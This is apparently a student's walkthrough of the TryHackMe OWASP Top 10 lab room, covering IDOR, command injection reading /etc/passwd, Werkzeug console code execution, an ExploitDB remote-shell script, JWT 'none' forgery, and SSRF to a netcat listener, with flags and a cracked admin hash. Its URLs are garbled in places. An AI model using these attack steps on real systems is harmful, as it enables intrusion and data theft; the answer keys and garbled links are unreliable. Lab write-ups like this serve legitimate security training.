NAME:JUSTUS KOECH_CS-SA07-24044

ASSIGNMENT: OWASP TOP 10

Overview

The OWASP Top 10 vulnerabilities represent critical security risks to web applications. Injection
flaws, such as SQL injection, occur when untrusted data is sent to an interpreter, and can be
prevented with parameterized queries and input validation. Broken authentication involves flaws
in session management or credential handling that allow impersonation, mitigated by
multi-factor authentication and secure password storage. Sensitive data exposure happens due to
inadequate protection of information and can be addressed by encrypting data and enforcing
access controls.

Security misconfigurations arise from incorrect or default settings, mitigated by regularly

updating software and performing security reviews. Cross-Site Scripting (XSS) involves the
injection of malicious scripts into web pages and can be prevented with input validation, output
encoding, and Content Security Policy (CSP). Insecure deserialization exploits untrusted data to
manipulate application logic or execute code, which can be mitigated by using serialization
frameworks with integrity checks.

This room focuses on the following OWASP Top 10 vulnerabilities

1. Injection
2. Broken Authentication
3. Sensitive Data Exposure
4. XML External Entity
5. Broken Access Control
6. Security Misconfiguration
7. Cross-site Scripting
8. Insecure Deserialisation
9. Components with Known Vulnerabilities
 10. Insufficient Logging & Monitoring

Task 4 [ Broken Access Control (IDOR Challenge) ]

Read and understand how IDOR works.

No Answer Needed
Deploy the machine and go to 10.10.67.17— Login with the username noot and the password
test1234.

No Answer Needed

Look at other users’ notes. What is the flag?

Hint: The URL contains ?note_id=1 — I wonder what happens if you change the parameter
value? You might be able to access another user’s notes.
Answer: flag{fivefourthree}

Firstly, start up the machine once it is booted up open Firefox and head to
http://10.10.57.180:81/Once there go to the log-in page and view the source code. You can view
the source code by using the hotkey combo CTRL + U. This will open a separate page.

Have a look around the web app. The developer has left themselves a note indicating that there is
sensitive data in a specific directory.

What is the name of the mentioned directory?

Hint: Have a look at the source code on the /login page.

Answer: /assets

Navigate to the directory you found in question one. What file stands out as being likely to
contain sensitive data?

Answer: webapp.db
Use the supporting material to access the sensitive data. What is the password hash of the admin
user?

Download the database (.db) and pull up your command line. Now list everything in the folder
using the ls -l.
Next, we need to access the database with SQLite3 using sqlite3 webapp.db followed by
.tables which brings up “users” and finally PRAGMA table_info (users)
Answer: 6eea9b7ef19179a06954edd0f6c05ceb

Crack the hash.

What is the admin’s plaintext password?
Hint: Read the supporting material.

The supporting material suggests we go to CrackStation. Once at the CrackStation site copy and
paste the password hash, confirm that you are not a robot, and select the “Crack Hashes” button.
Copy and paste the result

Answer: qwertyuiop

Log in as the admin. What is the flag?

the username is admin, then copy and paste the password

Answer: THM{Yzc2YjdkMjE5N2VjMzNhOTE3NjdiMjdl}

Task 9 [ 3. Injection ]

I’ve understood Injection attacks.

No Answer Needed
Task 10 [ 3.1. Command Injection ]

In this module, we are going to infiltrate the cowsay using Linux commands. TryHackMe was
kind enough to give us a few basic commands:

● whoami
● id
● ifconfig/ip addr
● uname -a
● ps -ef

But we will also be using a few others such as:

● $(ls)
● $(ls -la)
● $(cat /etc/passwd)
● $(cat /etc/os-release)

Now, let's get started. Head to the link given https://10.10.249.73

This was my approach, you can do things you can do things your way. I started with the
command: $(whoami)

This is actually the answer to the third question: apache

Next, I used the command $(ls) to find any files in the root directory

The results are [css drpepper.txt index.php js]. This leads us to the answer to the first question.
After that, it is time to find out the answer to the next question:

How many non-root/non-service/non-daemon users are there?

How do we determine that? We use the command $(cat /etc/passwd) to list the users. Command
broken down is [cat] or concatenate the file called [/etc/passwd]

It is a long list

What is the trend here?

There are no non-root/non-service/non-daemon users (standard users).

You can also use the command [awk] with a few parameters:

$(awk -F: ‘$3 >= 1000’ /etc/passwd)

Without going in-depth into the command, there are no standard users listed; making the answer
“0”. The hint here is sbin, which is short for system binary. sbin is meant for system admins and
should not be accessible by standard users. So, seeing /sbin/nologin is an indicator.

Going back to the question about the user name [apache] we can scroll to the bottom and find the
user’s [apache] shell [/sbin/nologin].

It is time to finish this task, by using a command to find the operating system version. The
command I used was [$(cat /etc/os-release)] the result was straightforward: 3.16.0. You can also
use [$(cat /etc/os-release)]

What strange text file is in the website’s root directory?

Answer: drpepper.txt
How many non-root/non-service/non-daemon users are there?

Answer: 0

What is the user’s shell set as?

Answer: apache

What is the user’s shell set as?

Answer: /sbin/nologin
What version of Alpine Linux is running?
Hint: The version can be found in “/etc/alpine-release”.

Answer: 3.16.0

Task 11 [ 4. Insecure Design ]

Navigate to http://MACHINE_IP:85 and get into joseph’s account. This application also has a
design flaw in its password reset mechanism. Can you figure out the weakness in the proposed
design and how to abuse it?

Time to once again boot up the VM, open Firefox, and make your way to http//10.10.128:85.
Once you get to the page you should notice that it is a login page. We want to use the information
that we have so far. THM provided that the person’s name is ‘joseph”, but we don’t have a
password and we are not sure if that is his username. But there is a button that says “I forgot my
password…” Click it and continue on.
Password reset page

It will first ask the user name, “joseph” was supplied, so we are using that. Now, the question’s
hint asks which is the easiest to guess from the three options. The first is an impossible task
within the scope of this task and so is the last question. So we are going to be guessing colors.
ROYGBIV (Red, Orange, Yellow, Green, Blue, Indigo, and Violet) is a safe place to start. I tried
starting at the spelling variation of Red and finally at “green” (it is case-sensitive). The system
automatically generates a new temp password. You should write it down and/or copy and paste
it. Use the information to log in.
And we are in.

Explore the options and make your way to private.

Open Flag.txt to get the flag and to finish the task.

Answer: THM{Not_3ven_c4tz_c0uld_sav3_U!}

Task 12 [5. Security Misconfiguration]

Time to boot up the machine again and head to the given website on Firefox.
Once you get there, input the following code:
import os; print(os.popen("ls -l").read())

Once we use the code it will return the database directory. The first question asks for the file
name for the database. The easiest way to figure out the answer is to look for the file name
ending in [.db].
The next question asks you to modify the code, so you can read the contents of the app.py. It
should look like this:
import os; print(os.popen("cat app.py").read())

Once we enter the altered code the site returns the flag:

THM{Just_a_tiny_misconfiguration}

Navigate to http://MACHINE_IP:86/console to access the Werkzeug console.

No Answer Needed

Use the Werkzeug console to run the following Python code to execute the ls -l command on the
server:

import os; print(os.popen("ls -l").read())

What is the database file name (the one with the .db extension) in the current directory?

Answer: todo.db

Modify the code to read the contents of the app.py file, which contains the application's source
code. What is the value of the secret_flag variable in the source code?

Answer: THM{Just_a_tiny_misconfiguration}

Task 15 [ Vulnerable and Outdated Components — Lab ]

This task is about exploiting outdated components. Open Firefox then head to the given site.
Looking at the site we learn that this is a bookstore app. Go to the Exploit database site and
search for the keywords “bookstore”.v

Download the exploit [47887.py] and use the command:

python3 47887.py [insert URL] and type “y” to launch the shell. Use the command [cat
/opt/flag.txt] to reveal the flag. The key to this is you already know what file you are looking for
/opt/flag.txt and we know that to open it we have to use the command [cat].

What is the content of the /opt/flag.txt file?

Hint: You know it’s a bookstore application. You should check for recent unauthenticated
bookstore apps RCEs.

Answer: THM{But_1ts_n0t_myf4ult!}

Task 16 [ 7. Identification and Authentication Failures]

I’ve understood broken authentication mechanisms.

No Answer Needed
Mark as Completed

Task 17 [ Identification and Authentication Failures Practical ]

Start up the machine and open Firefox. Then go to the given website.
register as the username “darren”, as the instructions say,

and a message will return with, “Error: This user is already registered”

Now, let’s use the same method to access the username “arthur”.
What is the flag that you found in darren’s account?

Answer: fe86079416a21a3c99937fea8874b667

Now try to do the same trick and see if you can log in as arthur.
What is the flag that you found in arthur’s account?
Answer: d9ac0f7db4fda460ac3edeb75d75e16e

Task 19 [Software Integrity Failures Security misconfiguration]

This is a fairly simple and straightforward task. You can use the attack box or your own browser
for this task. Open a new page and go to https://www.srihash.org/.
https://www.srihash.org/

Input the given URL [https://code.jquery.com/jquery-1.12.4.min.js] and ensure that you’re using
SHA-254.

What is the SHA-256 hash of https://code.jquery.com/jquery-1.12.4.min.js

Hint: Remember you can use https://www.srihash.org/ to calculate integrity hashes for SRI.

Answer: sha256-ZosEbRLbNQzLpnKIkEdrPv7lOy9C27hHQ+Xp8a4MxAQ=

Task 20 [Data Integrity Failures]

Start your machine and attack box, then go to the site that was given http://10.10.95.95IP:8089/.
Once you get to the screen, attempt to log into the guest account with a random password.

You will receive a message telling you how to log in.

Once you log in it give you another message.

Okay challenge accepted

Inspect the page source

Once you open the Dev Tools go to the Storage tab.

Open a word document. Copy the “Value” and paste the entire code to the document. It should
look like this:

eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VybmFtZSI6Imd1ZXN0IiwiZX
hwIjoxNjg2MzIxNjI2fQ.L159cLhW34u6BYodwGSJwHftLw34J-zKQF9Xo1uYBV
A

Next, you need to use the head and payload. If you recall from the task the header is up to the
“.”, then the payload is up to the next “.”, don’t worry the signature we won’t need it.

Go to https://appdevtools.com/base64-encoder-decoder and DECODE the header and payload

separately.

Copy and paste the decoded information and change the “HS256” to “none” in the header, then
change “guest” to “admin”. Now its time to encode this information. Take the result of the two
codes and combine them. It should look like this:

Copy and paste the pair into the value of the cookie.

Once you insert the code into the cookie, refresh the page to get the flag.
Try logging into the application as guest. What is guest’s account password? Answer

Hint: Try logging in with the wrong credentials.

Answer: guest

If your login was successful, you should now have a JWT stored as a cookie in your browser.
Press F12 to bring out the Developer Tools.

Depending on your browser, you will be able to edit cookies from the following tabs:

Firefox

Chrome
What is the name of the website’s cookie containing a JWT token? Answer Format:

Answer: jwt-session

Use the knowledge gained in this task to modify the JWT token so that the application thinks you
are the user “admin”.

No Answer Needed
What is the flag presented to the admin user?
eyJ0eXAiOiJKV1QiLCJhbGciOiJub25lIn0g=.eyJ1c2VybmFtZSI6Imd1ZXN0IiwiZXhwIjoxNzE
5NDM5NTExfQo==.

Answer: THM{Dont_take_cookies_from_strangers}

Task 21 [9. Security Logging and Monitoring Failures]

This is a fairly simple task. Download the log file and look at the data.

Notice the IP address that reoccurs in the span of 15 seconds? That is the attack and the IP
address is the answer to the first question. The next thing to notice is the different attempts. Same
IP address, different login names, in 15 seconds. This is the key to question two. It is a “Brute
Force” attack.

Fortinet’s definition.

What IP address is the attacker using? 49.99.13.16

Hint: Check for common actions in a short sequence of time.

Answer: 49.99.13.16

What kind of attack is being carried out?

Hint: What do you call trying combinations of usernames and passwords to gain access to users’
accounts?

Answer: Brute Force

Task 22 [10. Server-Side Request Forgery (SSRF)]

Start the machine and the attack box, then open Firefox. Head to the given site,
http://10.10.222.189:8087/

The first question asks for the host that is allowed in the Admin Area. to find this answer we
need to navigate to that page. Look for the three bars in the upper right and click on it.now
attempt to open the Admin Area.
Once you attempt, you will be given a message that you were denied access, because you are not
the “localhost”. This is the answer to the first question.

The next question asks for the server parameter for the resume download. Go back to the home
page. Hover your pointer over the bottom.

Either way, you will notice server=. “secure-file-storgage.com” is the answer that we are
looking for.

The next question asks us to intercept the request via SSRF.

We are going to the link which should be similar to this:

http://10.10.182.198:8087/download?server=secure-file-storage.com:8087&id=7548
2342

The next step is to remove and replace it with the IP of your attack box.

Open your terminal and use the command (this is for netcat listener):

nc -lvnp 8087

Once netcat listener is open, use the altered link. Keep an eye on the terminal to get the flag.

We are going to work on the server’s link to get into the Admin Area.

http://10.10.222.189:8087/download?server=secure-file-storage.com:8087&id=7548
2342

We already know from the first question that only “localhost” has access to the area. So we are
going to change the server to the localhost and admin by using
“server=http://localhost:8087/admin#&id=75482342”.
I figured out that you can use a method similar to SQL injection to break up the server and id in
the link (obfuscation). Some forums called it “escaping the # (hash)”. To break up the server and
id we will encode the url’s #, by changing it to %23. It should look like
this:server=http://localhost:8087/admin%23&id=75482342

Take this and insert it into the URL to get

this:http://http://10.10.222.189:8087/8087/download?server=http://localhost:8087/admin%23&id
=75482342

You should get the flag and feel a sense of accomplishment, because you completed an optional
task that required research and persistence.

_________________________________________________________

Explore the website. What is the only host allowed to access the admin area? Answer

Hint: Try to access the admin area. Can you find any useful info in the error messages?

Answer: localhost

Check the “Download Resume” button. Where does the server parameter point to?
Answer: secure-file-storage.com

Using SSRF, make the application send the request to your AttackBox instead of the secure file
storage. Are there any API keys in the intercepted request? Answer Format:

Answer: THM{Hello_Im_just_an_API_key}
Conclusion:

The OWASP Top 10 for 2021 highlights the evolving landscape of web application security
risks. It underscores the need for developers and security professionals to focus not only on
traditional vulnerabilities like injection and authentication flaws but also on emerging threats
such as insecure design and software integrity issues. By adhering to these guidelines,
organizations can significantly enhance their security posture and protect their applications
against a broad range of attacks. As web technologies and threats evolve, continuous education
and adaptation of security practices remain essential for mitigating risks effectively.

Shareablelink https://tryhackme.com/p/justuskoech96